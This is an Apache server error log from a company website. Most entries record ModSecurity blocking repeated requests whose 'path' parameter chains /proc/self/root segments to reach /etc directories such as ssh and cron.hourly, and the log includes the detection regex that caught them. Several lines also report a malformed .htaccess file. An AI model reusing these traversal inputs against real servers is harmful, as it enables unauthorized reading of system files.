[Thu Mar 19 14:49:09.612530 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:51662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3Fda6ubjKNq_cu4Z0XQAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:12.126866 2026] [proxy_fcgi:error] [pid 7893:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:49:12.815363 2026] [:error] [pid 8307:tid 140411674785536] [client 74.7.243.128:51670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3GL-FhjpZGs9ba8qIeQAAAwg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:14.986586 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:51672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3GgkwaGbbGflqUZDneQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:15.215457 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:51672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3GwkwaGbbGflqUZDnegAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:17.442149 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.243.128:51678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3HfqxLDW4GITHUkSGiQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:21.094123 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:58238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3Ida6ubjKNq_cu4Z0YwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:21.264030 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:58238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3Ida6ubjKNq_cu4Z0ZAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:25.018604 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:58254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3JQkwaGbbGflqUZDnhQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:34.679886 2026] [:error] [pid 7545:tid 140411691570944] [client 74.7.243.128:35432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3Ln8B84UptSoTJtYtFwAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:36.082035 2026] [proxy_fcgi:error] [pid 8307:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34906] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:49:39.531668 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:54512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3M_u8EFLIOrSqIpvGPwAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:43.795314 2026] [:error] [pid 7235:tid 140411557287680] [client 74.7.243.128:54526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3N_qxLDW4GITHUkSGmAAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:49.967316 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:47128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3PQkwaGbbGflqUZDnjgAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:53.183480 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:47138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3Qda6ubjKNq_cu4Z0dAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:49:57.946523 2026] [:error] [pid 14269:tid 140411733534464] [client 74.7.243.128:47146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3RQbLMZ6AikZjR9V7CwAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:01.034858 2026] [proxy_fcgi:error] [pid 7235:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35818] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:50:03.020658 2026] [core:alert] [pid 26799:tid 140411691570944] [client 74.7.243.128:38976] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:03.288434 2026] [core:alert] [pid 26799:tid 140411616036608] [client 57.141.18.28:42164] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 14:50:04.595238 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:38986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3TAbLMZ6AikZjR9V7EQAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:11.908286 2026] [:error] [pid 7545:tid 140411674785536] [client 74.7.243.128:56122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3U38B84UptSoTJtYtNQAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:20.204998 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:47428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3XOoXxyEfFpUF8f8qOAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:21.902763 2026] [mime_magic:error] [pid 30077:tid 140411574073088] (70014)End of file found: [client 57.141.18.97:42764] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:50:25.129803 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36646] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:50:27.607956 2026] [:error] [pid 7545:tid 140411649607424] [client 74.7.243.128:47438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3Y38B84UptSoTJtYtPwAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 14:50:32.798135 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:57758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw3aAkwaGbbGflqUZDnpwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
